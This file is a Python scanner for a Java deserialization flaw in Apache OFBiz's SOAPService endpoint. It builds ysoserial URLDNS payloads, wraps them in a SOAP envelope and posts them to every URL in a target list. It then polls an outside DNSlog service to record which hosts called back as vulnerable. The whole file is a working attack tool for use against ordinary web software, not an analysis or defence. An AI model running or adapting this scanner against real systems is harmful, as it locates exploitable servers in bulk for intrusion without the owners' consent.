#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
urllib3.disable_warnings()
def main():
    if(not os.path.exists("target.txt")):
        exit("put url in target.txt! ")
    if(not os.path.exists("ysoserial.jar")):
        exit("where is ysoserial.jar?")
    dnslogdomain = requests.get("https://dns.xn--9tr.com/new_gen").text
    if(len(dnslogdomain.split(".")[0])!=8):
        exit("Maybe `dns.xn--9tr.com` is down..")
    print("[!] Your DnsLog Domain Is `{0}`".format(dnslogdomain))
    dnslogresurl = "https://dns.xn--9tr.com/"+dnslogdomain.split(".")[0]
    with open("target.txt")as f:
        urls = f.readlines()
    uuids={}
    print("\n")
    print(" payload发送开始 ".center(50,"-"))
    for url in urls:
        url = url.strip()
        uid = uuid.uuid1().hex
        uuids[url]=uid
        cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1} > tmp".format(uid,dnslogdomain)
        r = os.popen(cmd)   
        r.close()  
        with open("tmp",'rb') as f:
            payload = binascii.hexlify(f.read())
        data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
            <soapenv:Header/>
            <soapenv:Body>
            <ser>
        <map-HashMap>
            <map-Entry>
                <map-Key>
                    <cus-obj>{0}</cus-obj>
                </map-Key>
                <map-Value>
                    <std-String value="http://baidu.com"/>
                </map-Value>
            </map-Entry>
        </map-HashMap>
            </ser>
            </soapenv:Body>
            </soapenv:Envelope>
            '''.format(payload.decode())
        headers = {
            "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
        }
        try:
            print("[-] Send payload to {0}".format(url))
            requests.post(url+"/webtools/control/SOAPService",data=data,verify=False,headers=headers,timeout=5)
        except:
            pass
    print(" payload发送完毕 ".center(50,"-"))
    print("\n")
    print("---".center(50,"-"))
    success=[]
    res = requests.get(dnslogresurl).text
    for target in uuids:
        if(uuids[target] in res):
            print("[+] {0} 漏洞存在".format(target))
            success.append(target)
        else:
            print("[!] {0} 漏洞不存在".format(target))
    print("---".center(50,"-"))
    filename = uuid.uuid1().hex+".txt"
    with open(filename,"w") as f:
        f.write("\n".join(success))
        print("[*] put res in {0}".format(filename))

if __name__ == "__main__":
    main()